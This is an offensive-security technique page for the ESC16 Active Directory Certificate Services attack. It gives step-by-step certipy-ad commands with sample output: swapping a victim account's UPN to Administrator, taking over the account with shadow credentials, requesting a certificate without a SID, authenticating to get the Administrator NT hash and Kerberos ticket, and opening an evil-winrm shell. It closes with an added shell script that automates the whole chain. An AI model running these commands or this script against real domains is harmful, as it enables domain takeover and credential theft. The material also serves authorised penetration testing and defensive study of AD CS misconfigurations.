Technique

ESC16

The CA has the szOID_NTDS_CA_SECURITY_EXT security extension (OID 1.3.6.1.4.1.311.25.2) disabled for every certificate it issues, so no issued certificate carries the requesting account's SID. The DC then has to map a certificate to an account by the UPN in its subject alternative name, and an attacker who can rewrite the userPrincipalName of any account can make that UPN point at a privileged user.

Prerequisites

OID 1.3.6.1.4.1.311.25.2 (szOID_NTDS_CA_SECURITY_EXT) is listed in the CA's DisableExtensionList registry value, so issued certificates carry no SID security extension
The DCs are not in full enforcement (StrongCertificateBindingEnforcement = 2): in compatibility mode the KDC still maps a certificate without the SID extension by its UPN, in full enforcement a certificate with neither the SID extension nor a strong explicit mapping is rejected
Write access (e.g. GenericWrite) over a victim account whose userPrincipalName can be rewritten; the certificate is requested as that account, so its credentials are needed as well (see 1.3.0)

1.0.0 certipy-ad

1.1.0 Find vulnerability

-k -no-pass authenticates with the Kerberos ticket in KRB5CCNAME, so -target has to be the DC's DNS name rather than its IP.

certipy-ad find -k -no-pass \
			-vulnerable -stdout \
			-dc-ip $ip \
			-target $dns'.'$domain

[!] Vulnerabilities
ESC16 : Security Extension is disabled.

1.2.0 UPN manipulation

1.2.1 Read the victim user's current UPN

Keep the value: it is what 1.5.0 has to restore.

certipy-ad account -k -no-pass -dc-ip $ip -target $dns'.'$domain -user 'user_to_change' read

[*] Reading attributes for 'user_to_change':
userPrincipalName : user_to_change@domain.local

1.2.2 Set the victim user's UPN to the target's

targetUPN is the UPN the certificate should end up with, here the built-in Administrator. That account normally has no explicit userPrincipalName of its own, which is why the DC accepts this write instead of rejecting it as a duplicate UPN.

targetUPN='administrator@'$domain

certipy-ad account -target $dns'.'$domain \
					-k -no-pass -dc-ip $ip \
					-user 'user_to_change' \
					-upn $targetUPN update

[*] Updating user 'user_to_change':
    userPrincipalName                   : administrator@domain.local
[*] Successfully updated 'user_to_change'

1.3.0 Obtain credentials for the victim user (if needed)

The certificate in 1.4.0 has to be requested as user_to_change, so a ticket for that account is required. If only write access over the account is available, shadow credentials provide one without touching its password: 'shadow auto' adds a key to msDS-KeyCredentialLink, authenticates with it via PKINIT, prints the account's NT hash, saves user_to_change.ccache and restores the attribute afterwards. It runs with the attacking account's credentials (-u/-p), since no ticket for the victim exists yet.

certipy-ad shadow \
    -u $user'@'$domain -p $pass \
    -dc-ip $ip -account 'user_to_change' \
    auto

1.4.0 Request certificate

The request has to be made as the victim, so it uses user_to_change.ccache from 1.3.0 (or any other ticket for that account) rather than the attacking account's ticket. The built-in User template takes the UPN from the requesting account, so the issued certificate carries administrator@domain.local in its SAN and, because of ESC16, no SID; certipy-ad names the output after that UPN, administrator.pfx.

KRB5CCNAME=user_to_change.ccache certipy-ad req -k -no-pass -dc-ip $ip -target $dns'.'$domain \
				-ca 'domain-DC01-CA' -template 'User'

1.5.0 Revert UPN manipulation and authenticate

1.5.1 Revert

Restore the value read in 1.2.1 before authenticating, using the attacking account's ticket again. While user_to_change still holds administrator@domain.local, the KDC resolves the certificate's UPN to user_to_change, and the certificate would log in as the victim instead of as Administrator.

certipy-ad account -target $dns'.'$domain \
					-k -no-pass -dc-ip $ip \
					-user 'user_to_change' -upn 'user_to_change@domain.local' update

1.5.2 Authenticate

With the victim's UPN restored, administrator@domain.local matches only the Administrator account's implicit UPN (sAMAccountName@domain). Passing -username and -domain explicitly avoids relying on what certipy-ad derives from the certificate. On success certipy-ad saves administrator.ccache and prints the account's NT hash.

certipy-ad auth -pfx administrator.pfx \
			-username 'Administrator' \
			-domain $domain \
			-dc-ip $ip

1.6.0 Profit

administrator.ccache from the authentication step works with any Kerberos-aware tool; evil-winrm -r needs the realm configured in /etc/krb5.conf. The NT hash certipy-ad printed alongside it can be used instead with evil-winrm -H.

export KRB5CCNAME=administrator.ccache
evil-winrm -i $dns'.'$domain -r $domain
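The chain above as one script, added here as an example rather than taken from the original page or from certipy's own code. It records the victim's original UPN, restores it on any exit (so an aborted run never leaves the victim pointing at the target's UPN), runs only the certificate request under the victim's ticket, and checks the issued certificate really lacks the SID extension before the UPN is put back and authentication is attempted. It assumes certipy-ad and openssl on PATH, the $ip, $dns and $domain variables used on this page, KRB5CCNAME holding a ticket for an account with write access over the victim, and a separate cache (such as the one 'shadow auto' writes) holding a ticket for the victim; the function and variable names are this example's own.

```shell
#!/bin/sh
# Added example (not from the original page): ESC16 UPN swap with guaranteed revert.
# Assumptions: certipy-ad and openssl on PATH; $ip, $dns, $domain set as on this
# page; KRB5CCNAME holds a ticket for an account with write access over the victim;
# a separate cache holds a ticket for the victim itself. Names below are assumed.
set -eu

# Pull userPrincipalName out of 'certipy-ad account ... read' output (stdin).
parse_upn() {
	awk -F': ' '/userPrincipalName/ { gsub(/^[ \t]+|[ \t]+$/, "", $2); print $2; exit }'
}

# Succeed if 'openssl x509 -noout -text' output (stdin) lists the SID security
# extension 1.3.6.1.4.1.311.25.2; on an ESC16 CA it is absent from every certificate.
cert_has_sid_extension() {
	grep -q '1\.3\.6\.1\.4\.1\.311\.25\.2'
}

# esc16_run VICTIM TARGET_UPN VICTIM_CCACHE CA [TEMPLATE]
esc16_run() {
	victim="$1"; target_upn="$2"; victim_ccache="$3"; ca="$4"; template="${5:-User}"
	dc="$dns.$domain"

	orig_upn=$(certipy-ad account -k -no-pass -dc-ip "$ip" -target "$dc" -user "$victim" read | parse_upn)
	[ -n "$orig_upn" ] || { echo "[-] could not read the UPN of $victim" >&2; return 1; }
	echo "[*] original UPN of $victim: $orig_upn"

	# Values are expanded now, so the restore runs with them even after the
	# function has returned or the script was interrupted. It runs with the
	# attacking account's ticket (KRB5CCNAME), which is what has write access.
	trap "certipy-ad account -k -no-pass -dc-ip '$ip' -target '$dc' -user '$victim' -upn '$orig_upn' update" EXIT

	certipy-ad account -k -no-pass -dc-ip "$ip" -target "$dc" -user "$victim" -upn "$target_upn" update

	# The request is made as the victim, so only this command uses the victim's ticket.
	KRB5CCNAME="$victim_ccache" certipy-ad req -k -no-pass -dc-ip "$ip" -target "$dc" -ca "$ca" -template "$template"

	# certipy-ad names the .pfx after the UPN's local part; export the certificate
	# as PEM and confirm the SID extension is really missing before going further.
	pfx="${target_upn%%@*}.pfx"
	certipy-ad cert -pfx "$pfx" -nokey -out "${pfx%.pfx}.crt"
	if openssl x509 -in "${pfx%.pfx}.crt" -noout -text | cert_has_sid_extension; then
		echo "[-] $pfx carries the SID extension; the KDC would map it to $victim, not to $target_upn" >&2
		return 1
	fi
	echo "[+] $pfx has no SID extension. The UPN is restored when this script exits; run 'certipy-ad auth' only after that."
}

# Usage with the values this page uses (victim ticket from the shadow step):
# esc16_run user_to_change "administrator@$domain" user_to_change.ccache domain-DC01-CA User
```

The revert is deliberately tied to the shell's EXIT trap rather than placed after the request, and the authentication step is left to be run once the script has exited: as long as the victim still carries the target's UPN, the KDC resolves the certificate to the victim, so authenticating earlier would silently log in as the wrong account.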
